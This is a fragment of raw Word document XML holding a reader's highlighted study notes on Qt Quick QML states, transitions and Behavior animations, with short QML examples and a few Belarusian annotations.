        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was designed </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to facilitate the creation of fluid UIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These are user interfaces where the UI components animate instead of appearing, disappearing, or jumping abruptly. Qt Quick provides two simple ways to have UI components move with animation instead of instantly appearing at their new location.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="states-and-transitions"/>
      <w:bookmarkStart w:id="644" w:name="_Toc483000667"/>
      <w:bookmarkStart w:id="645" w:name="_Toc483003684"/>
      <w:bookmarkStart w:id="646" w:name="_Toc483604020"/>
      <w:bookmarkStart w:id="647" w:name="_Toc483605240"/>
      <w:bookmarkEnd w:id="643"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>States and Transitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>
      <w:bookmarkEnd w:id="645"/>
      <w:bookmarkEnd w:id="646"/>
      <w:bookmarkEnd w:id="647"/>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick allows you to declare </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>various UI states in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId495" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These states are comprised of property changes from a base state, and can be a useful way of organizing your </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UI logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are objects you can associate with an item to define how its properties will animate when they change due to a state change.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>States and transitions for an item can be declared with the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId496" w:anchor="states-prop" w:history="1">
        <w:r w:rsidRPr="00D513E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::states</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId497" w:anchor="transitions-prop" w:history="1">
        <w:r w:rsidRPr="00D513E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::transitions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties. States are declared inside the states list property of an item, usually the root item of the component. Transitions defined on the same item are used to animate the changes in the state. Here is an example.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    id</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container</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width</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320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height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Rectangle</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id</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rect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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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width</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height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MouseArea</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anchors</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fill</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parent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onClicked</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container</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state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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'other'</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container</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state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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>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container</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state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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'other'</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states</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This adds a second state to the container where the rectangle is farther to the right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State</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"other"</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PropertyChanges</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target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rect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x</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200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transitions</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This adds a transition that defaults to applying to all state changes</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Transition</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This applies a default NumberAnimation to any changes a state change makes to x or y properties</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NumberAnimation</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properties</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"x,y"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="648" w:name="animating-property-changes"/>
      <w:bookmarkStart w:id="649" w:name="_Toc483000668"/>
      <w:bookmarkStart w:id="650" w:name="_Toc483003685"/>
      <w:bookmarkStart w:id="651" w:name="_Toc483604021"/>
      <w:bookmarkStart w:id="652" w:name="_Toc483605241"/>
      <w:bookmarkEnd w:id="648"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animating Property Changes.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
      <w:bookmarkEnd w:id="650"/>
      <w:bookmarkEnd w:id="651"/>
      <w:bookmarkEnd w:id="652"/>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00C21832" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to specify an animation for a property to use when it changes. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is then applied to all changes, regardless of their source</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The following example animates a button moving around the screen using behaviors.</w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// відаць, </w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">animation sources </w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">могуць выкарыстоўвацца толькі ў пэўных кантэкстах, тады як </w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidR="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> адказвае за змену значэння ўласцівасцяў заўжды //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000172C1" w:rsidRPr="00CF4C26" w:rsidRDefault="000172C1" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000172C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Не атрымалася ў мяне… а </w:t>
      </w:r>
      <w:r w:rsidRPr="000172C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="000172C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000172C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">не працуе з </w:t>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>уласна створанымі</w:t>
      </w:r>
      <w:r w:rsidRPr="000172C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> ў модулі тыпамі…</w:t>
      </w:r>
      <w:r w:rsidR="00CF4C26" w:rsidRPr="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF4C26" w:rsidRPr="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Таму што не паставіў </w:t>
      </w:r>
      <w:r w:rsidR="00CF4C26" w:rsidRPr="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus: true!</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Item</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width</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320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height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Rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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width</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height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This is the behavior, and it applies a NumberAnimation to any attempt to set the x property</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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NumberAnimation</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//This specifies how long the animation takes</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duration</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600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//This selects an easing curve to interpolate with, the default is Easing.Linear</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easing</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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OutBounce</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MouseArea</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anchors</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fill</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parent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onClicked</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parent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x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0</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parent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x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200</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parent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x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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="other-animations"/>
      <w:bookmarkStart w:id="654" w:name="_Toc483000669"/>
      <w:bookmarkStart w:id="655" w:name="_Toc483003686"/>
      <w:bookmarkStart w:id="656" w:name="_Toc483604022"/>
      <w:bookmarkStart w:id="657" w:name="_Toc483605242"/>
      <w:bookmarkEnd w:id="653"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
      <w:bookmarkEnd w:id="655"/>
      <w:bookmarkEnd w:id="656"/>
      <w:bookmarkEnd w:id="657"/>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Not all animations have to be tied </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a specific property or state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can also create animations more generally, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specify target items and properties inside the animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here are some </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
